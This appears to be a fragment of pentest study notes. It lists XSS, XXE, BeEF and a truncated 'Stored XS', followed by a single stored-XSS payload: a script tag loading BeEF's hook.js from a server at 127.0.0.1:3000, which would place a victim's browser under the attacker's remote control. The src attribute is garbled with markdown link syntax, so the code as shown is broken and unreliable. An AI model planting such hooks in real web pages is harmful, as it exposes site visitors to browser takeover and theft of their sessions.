XSS
XXE
BeEF
Stored XS
<script src="[<http://127.0.0.1:3000/hook.js>](<http://127.0.0.1:3000/hook.js>)"></script>